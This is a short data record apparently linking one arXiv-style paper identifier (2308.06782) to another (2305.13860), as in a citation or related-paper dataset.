2308.06782 | [
"2305.13860"
]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.